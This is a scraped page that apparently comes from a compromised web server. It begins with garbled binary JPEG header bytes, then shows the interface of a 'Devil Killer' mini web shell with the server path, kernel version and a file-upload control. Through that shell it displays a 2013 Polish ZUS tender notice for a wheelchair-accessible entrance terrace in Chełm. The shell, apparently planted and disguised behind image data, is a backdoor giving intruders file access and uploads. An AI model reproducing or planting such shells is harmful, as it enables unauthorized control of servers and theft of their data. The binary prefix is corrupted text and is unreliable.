JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130726/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130726/297990-N-2013.html

<p class="kh_header"><b>Biłgoraj: Wykonanie modernizacji tarasu wejścia głównego
z podjazdem dla niepełnosprawnych w I/ZUS w Chełmie</b><br>
<b>Numer ogłoszenia: 297990 - 2013; data zamieszczenia: 26.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Ubezpieczeń Społecznych Oddział w Biłgoraju , ul. Kościuszki 103, 23-400 Biłgoraj, woj. lubelskie, tel. 084 6881200, 6881209, faks 084 6866974.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zus.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie modernizacji tarasu wejścia głównego
z podjazdem dla niepełnosprawnych w I/ZUS w Chełmie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonanie robót polegających na  dostosowaniu budynku I/ZUS w Chełmie przy Al. I Armii Wojska Polskiego 8 do potrzeb osób niepełnosprawnych poprzez modernizację tarasu wejścia głównego z podjazdem dla niepełnosprawnych. 
2. Zakres robót obejmuje w szczególności:
a) rozbiórkę płyty tarasu, schodów i podjazdu,
b) rozbiórkę murków balustradowych z cegły klinkierowej i balustrady podjazdu,
c) wykonanie tarasu z monolitycznej płyty żelbetowej wraz ze schodami i podjazdem dla osób niepełnosprawnych,
d) wykonanie daszku z poliwęglanu litego gr 4mm na konstrukcji stalowej,
e) montaż stojaka na rowery,
f) wyłożenie powierzchni tarasu, schodów i pochylni płytami z granitu płomieniowanego grubości 2 cm.
g) wykonanie przyłącza do kanalizacji deszczowej,
h ułożenie kostki brukowej wokół  tarasu i pochylni,
i) wymiana kostki brukowej przed tarasem, 
j) wywóz i utylizację materiałów z rozbiórki.
3. Szczegółowy opis robót zawarty jest w dokumentacji dotyczącej przedmiotu zamówienia na którą się składają:
1) Projekt budowlany wykonawczy stanowiący zał. nr 1 do siwz.   
2) SSTWiOR stanowiąca zał. nr 2 do siwz 
3) Przedmiar robót stanowiący zał. nr 3 do siwz
4. Przedmiot zamówienia winien być realizowany  na podstawie:
a) projektu wykonawczego, 
b) przedmiaru robót, 
c) SSTWiOR 
d) ewentualnej wizji lokalnej,  
e) obowiązujących przepisów i norm oraz zasad sztuki budowlanej 
5. Wykonawca winien zrealizować przedmiot zamówienia w pierwszej kolejności w oparciu o projekt budowlany a w dalszej kolejności winien kierować się SSTWiOR oraz przedmiarem, które pełnią jedynie rolę pomocniczą i uzupełniającą.
6. Zaleca się aby Wykonawcy przed złożeniem oferty dokonali oględzin miejsc przedmiotowych robót. Oględzin frontu robót można dokonać po uprzednim uzgodnieniu terminu z jedną z osób upoważnioną do porozumiewania się z Wykonawcami w zakresie przedmiotu zamówienia określoną w § 6 SIWZ.  
7. Wykonawca na wykonane roboty udziela 36 miesięcy gwarancji od dnia podpisania protokółu odbioru końcowego.  
8. Prace objęte zamówieniem mogące zakłócać prawidłowe funkcjonowanie (pod względem pracy i obsługi klientów) budynku I/ ZUS w Chełmie oraz mogące stwarzać w szczególności niebezpieczeństwo dla klientów lub pracowników Zamawiającego należy prowadzić po godzinach pracy Inspektoratu ZUS oraz w dni wolne od pracy ZUS. 
9. Wykonawca zapewni we własnym zakresie i na własny koszt materiały i urządzenia (w tym zabezpieczenia prowadzonych robót) niezbędne do należytego (zgodnie ze SIWZ i sztuką budowlaną) wykonania przedmiotowego zamówienia. 
10. W zakresie przedmiotowych robót wszelkie miejsca mogące ulec zniszczeniu lub uszkodzeniu w trakcie prowadzenia robót winny być pozabezpieczane folią lub w inny  sposób uniemożliwiający uszkodzenie lub zniszczenie mienia i infrastruktury Zamawiającego. 
11. Zamawiający nieodpłatnie udostępni energię elektryczną potrzebną do wykonania zamówienia, wodę oraz miejsce pod kontener na składowanie bieżących materiałów, pomieszczenie na złożenie niezbędnych podręcznych urządzeń i materiałów oraz miejsce pod kontener na śmieci.  
12. Zamawiający nie zastrzega powierzania podwykonawcom części zamówienia. 
13. W formularzu ofertowym Wykonawca winien wskazać zakres zamówienia jaki powierzy podwykonawcom. W przypadku nie określenia w ogóle w formularzu podwykonawcy Zamawiający uzna, że Wykonawca wykona zamówienie samodzielnie bez udziału podwykonawców.  
14. Udział podwykonawcy w realizacji niniejszego zamówienia nie zwalnia Wykonawcy z zobowiązań określonych niniejszym postępowaniem. Wszelkie działania, uchybienia lub zaniedbania podwykonawcy będą traktowane jak działania samego Wykonawcy.  
15. Wykonawca w okresie wykonywania zamówienia zobowiązany jest do utrzymywania kontaktu z osobą upoważnioną  przez  Zamawiającego do kontaktów pod podanymi w ofercie i dostępnymi środkami komunikacji: nr telefonu, e-mailem lub fax-em..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.22.30.00-6, 45.23.32.60-9, 45.26.24.00-5, 45.31.10.00-0, 45.33.23.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Wykonawcy są zobowiązani do wniesienia wadium do upływu terminu składania ofert tj. do dnia 12.08.2013r. do godz. 11:00 w wysokości 3 000 zł. Słownie: trzy tysiące złotych.
2. Wadium może być wnoszone w jednej lub kilku następujących formach:
1) pieniądzu;
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym;
3) gwarancjach bankowych;
4) gwarancjach ubezpieczeniowych;
5) poręczeniach udzielanych przez podmioty, o których mowa w art.6b ust.5 pkt. 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz.1158 ze zm.).
3. Złożone wadium musi zabezpieczać ofertę w całym okresie związania ofertą tj.: 30 dni od upływu terminu do składania ofert tj. od dnia 12.08.2013r. do dnia 10.09.2013r. 
4. W przypadku nie zabezpieczenia oferty akceptowaną formą wadium Zamawiający wykluczy Wykonawcę z postępowania.
5. Wadium w formie pieniężnej należy przelewem wpłacić na konto Zamawiającego
Nr  58 1020  5590 0000 0902 9030 7014
w PKO BP Centrum Korporacyjne I, ul. Nowogrodzka 35/41, umieszczając na przelewie informację z oznaczeniem  odpowiednio: wadium  - przetarg podjazd  I/ZUS Chełm
6. Wadium wnoszone w formie pieniężnej winno zabezpieczać ofertę począwszy od upływu terminu składania ofert tzn. winno się znaleźć na koncie bankowym zamawiającego najpóźniej o godz. 11:00 dnia 12.08.2013r. uwzględniając uwarunkowania bankowe (sesje) związane z przelewaniem kwot pieniężnych. 
7. Kopię dowodu wpłaty/przelewu wadium zaleca się załączyć do składanej oferty.
8. Wadium w pozostałych akceptowanych formach niepieniężnych należy złożyć w siedzibie Zamawiającego przy zachowaniu poniższych zasad:
1) Jeżeli wadium będzie składane osobiście należy je przekazać do depozytu kasowego w pokoju nr 301 w budynku przy ul. Kościuszki 103 w terminie określonym w § 10 ust. 3 SIWZ. 
2) Jeżeli będzie wysyłane pocztą lub kurierem należy umieścić go w oddzielnej kopercie niż oferta z opisem: wadium  - przetarg podjazd  I/ZUS Chełm
i złożyć w miejscu i terminie określonym w § 10 ust. 3 SIWZ tak jak dla oferty.
9. Dyspozycje w zakresie zwrotu wadium dla Wykonawców, których oferty nie zostaną wybrane, Zamawiający przekaże niezwłocznie po dokonaniu wyboru najkorzystniejszej oferty lub unieważnieniu  postępowania z wyjątkiem wykonawcy którego oferta została wybrana jako najkorzystniejsza za wyjątkiem sytuacji określonej w art. 46 ust.4a Pzp. 
10. Zamawiający zażąda ponownego wniesienia wadium (ustanawiając stosowny termin do jego wniesienia) przez Wykonawcę, któremu zwrócono wadium na podstawie art. 46 ust. 1 Pzp, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza.
11. Do wadium wnoszonego w poręczeniach i gwarancjach bankowych stosuje się przepisy ustawy Prawo Bankowe z dnia 29 sierpnia 1997 r. (Dz.U. Nr 72 poz.665 z 2002r.)
12. Oddział banku zagranicznego może udzielić poręczeń i gwarancji bankowych, jeżeli posiada na wykonywanie tych czynności zezwolenie Komisji Nadzoru Bankowego.
13. Zwrotu wadium dla Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający dokona niezwłocznie po wniesieniu zabezpieczenia należytego wykonania umowy oraz zawarciu umowy w sprawie zamówienia publicznego lub unieważnieniu postępowania.
14. Wadium wniesione w pieniądzu będzie zwracane z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszonymi o koszty prowadzenia rachunku oraz prowizji bankowej za przelew na rachunek bankowy wskazany przez Wykonawcę.
15. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
a) odmówił podpisania umowy na warunkach określonych w ofercie;
b) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
c) zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie   Wykonawcy;
16. UWAGA: Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa  w art. 26 ust. 3 ustawy Pzp, nie złożył w ogóle dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nie leżących po jego stronie.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony  jeżeli Wykonawca:
a) oświadczy że spełnia w/w warunek. 
Ocena spełniania w/w warunku zostanie przeprowadzona metodą spełnia / nie spełnia na podstawie złożonego przez Wykonawcę oświadczenia z art. 22 ust. 1 Pzp. żądanego w  § 5 ust.1.ppkt 1.1 siwz</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony  jeżeli Wykonawca:
a) złoży stosowne oświadczenie że spełnia w/w warunek. 
b) wykaże, że wykonał co najmniej dwie roboty budowlane odpowiadające przedmiotowi zamówienia. Jako odpowiadające przedmiotowi zamówienia uznane będą roboty polegające na budowie lub remoncie w ramach których były wykonane wyłącznie lub m.in. elementy konstrukcyjne budynku lub budowli tj. np. płyty żelbetowe, stropy, ściany, konstrukcje dachów. Roboty na okoliczność spełnienia niniejszego warunku winny być wykonane w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie każda na kwotę brutto min. 100 000 zł. 
Ocena spełniania w/w warunku zostanie przeprowadzona metodą spełnia / nie spełnia na podstawie złożonego przez Wykonawcę oświadczenia z art. 22 ust. 1 Pzp. żądanego w  § 5 ust.1.ppkt 1.1 siwz oraz złożonych dokumentów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony jeżeli Wykonawca:
a) oświadczy że spełnia w/w warunek.   
Ocena spełniania w/w warunku zostanie przeprowadzona metodą spełnia / nie spełnia na podstawie złożonego przez Wykonawcę oświadczenia z art. 22 ust. 1 Pzp. żądanego w  § 5 ust.1.ppkt 1.1 siwz</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony jeżeli Wykonawca:
a) oświadczy że spełnia w/w warunek.   
b) oświadczy że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane ustawą Prawo Budowlane uprawnienia
Ocena spełniania w/w warunku zostanie przeprowadzona metodą spełnia / nie spełnia na podstawie złożonego przez Wykonawcę oświadczenia z art. 22 ust. 1 Pzp. żądanego w  § 5 ust.1.ppkt 1.1 siwz</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony jeżeli Wykonawca:
a) oświadczy że spełnia w/w warunek.   
Ocena spełniania w/w warunku zostanie przeprowadzona metodą spełnia / nie spełnia na podstawie złożonego przez Wykonawcę oświadczenia z art. 22 ust. 1 Pzp. żądanego w  § 5 ust.1.ppkt 1.1 siwz</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Formularz oferty wypełniony i podpisany przez uprawnione do reprezentacji osoby po stronie Wykonawcy wg wzoru określonego zał. Nr 7 do niniejszej siwz.   
2) Kosztorys ofertowy opracowany zgodnie z § 11 siwz i podpisany przez uprawnione do reprezentacji osoby po stronie Wykonawcy. 
3) Pełnomocnictwo - w przypadku reprezentacji przez pełnomocnika w formie określonej w § 9 ust.9 siwz.  
4) Pełnomocnictwo ustanawiające pełnomocnika - w przypadku oferty składanej przez wykonawców ubiegających się wspólnie o zamówienie (konsorcjum) w sposób określony w § 5 ust.10-11 siwz.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiany istotnych postanowień zawartej umowy nie mogą dotyczyć treści oferty na podstawie której dokonano wyboru wykonawcy z zastrzeżeniem ust. 5 niniejszego opisu.
2. Nie stanowi zmiany istotnych postanowień umowy w rozumieniu art. 144 ustawy Prawo zamówień publicznych w szczególności: 
1) zmiana danych związanych z obsługą administracyjno-organizacyjną umowy (np. zmiana nr rachunku bankowego na który jest regulowane wynagrodzenie). 
2) zmiana danych teleadresowych, 
3) wystąpienie zamówień uzupełniających o których mowa w art. 67 ust. 1 pkt 6 w zakresie wskazanym w siwz. 
4) Zmiana osób upoważnionych do kontaktu w zakresie realizacji umowy  
3. Zmiana o której mowa w ust. 2 może nastąpić w formie oświadczenia złożonego drugiej stronie w taki sposób aby treść do niej dotarła określony umową. 
4. Wystąpienie którejkolwiek z sytuacji określonych w ust. 5 wymaga każdorazowo zgody Zamawiającego i Wykonawcy i może być taka zmiana dokonana wyłącznie w formie pisemnego aneksu podpisanego przez obie strony.
5. Dopuszcza się poniższe zmiany istotnych postanowień zawartej umowy tj.: 
1) zmiany będące następstwem okoliczności leżących po stronie Zamawiającego, w szczególności: 
a) konieczność usunięcia błędów lub wprowadzenia zmian w technologii wykonania zamówienia; 
2) zmiany będące następstwem działania osób lub podmiotów trzecich w szczególności: 
a) przekroczenie zakreślonych przez prawo terminów wydania przez organy administracji decyzji, zezwoleń, itp.; 
b) wydanie postanowienia lub decyzji przez uprawniony do tego organ administracji publicznej o wstrzymaniu robót budowlanych co nie wynika z  okoliczności leżących po stronie wykonawcy
c) wydanie postanowienia lub decyzji przez uprawniony  do tego organ administracji publicznej o wyłączeniu z użytkowania czasowo lub w całości budynku lub posesji będących przedmiotem umowy w taki sposób, że nie będzie możliwa lub niecelowa przez okres wyłączenia ich realizacja przedmiotowych robót. 
d) okupacje lub strajki okupacyjne pracowników zamawiającego lub osób z zewnątrz uniemożliwiające prowadzenie przedmiotowych robót. 
W sytuacji określonej w ust. 5 ppkt 2) lit a-d termin realizacji może ulec wydłużeniu o czas przez jaki wykonawca był pozbawiony możliwości prowadzenia przedmiotowych robót.  
3) Zmiany wynikające ze zmiany  sposobu spełnienia świadczenia w szczególności zmiany technologiczne tj.: 
a) konieczność usunięcia błędów technologicznych w dokumentacji (przedmiarze robót) czego nie można było wcześniej przewidzieć; 
b) konieczność zrealizowania części zakresu zamówienia przy zastosowaniu innych rozwiązań technicznych/technologicznych niż wskazane w siwz, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem zamówienia czego nie można było przewidzieć, 
c) konieczność zrealizowania części zakresu zamówienia przy zastosowaniu innych rozwiązań technicznych ze względu na zmiany obowiązującego prawa czego nie można było przewidzieć;
